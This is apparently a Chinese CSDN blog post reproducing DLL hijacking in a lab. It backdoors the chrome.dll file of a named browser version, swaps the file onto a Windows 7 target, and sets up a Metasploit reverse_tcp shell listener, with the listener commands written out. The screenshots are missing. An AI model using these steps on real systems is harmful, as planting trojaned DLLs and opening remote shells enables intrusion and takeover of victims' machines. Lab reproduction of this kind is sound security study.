DLL劫持复现

本文通过实例展示了DLL劫持的过程。首先利用backdoor工具检测chrome.dll的注入点,选择合适位置进行恶意DLL注入,然后在Win7系统中替换原文件。成功运行应用后,Kali Linux系统监听到会话,表明命令执行成功。DLL劫持是通过将恶意DLL放在系统搜索路径的优先位置,欺骗系统加载,从而达到控制或影响程序执行的目的。
摘要由CSDN通过智能技术生成
#环境工具 
kali         #攻击机 172.20.152.11
win7         #目标机 172.20.152.8
backdoor     #dll注入工具
procexp      #线程分析工具
目标应用版本  #某60安全浏览器 12.2.1812.0

已知此应用chrome.dll存在dll注入
请添加图片描述
使用backdoor工具检测注入点
请添加图片描述
随便选择一个可写入空间较大的注入点进行注入
请添加图片描述
文件保存在backdoored目录下 复制到win7替换原文件
请添加图片描述

kali设置监听
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 172.20.152.11
set lport 1111
exploit

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值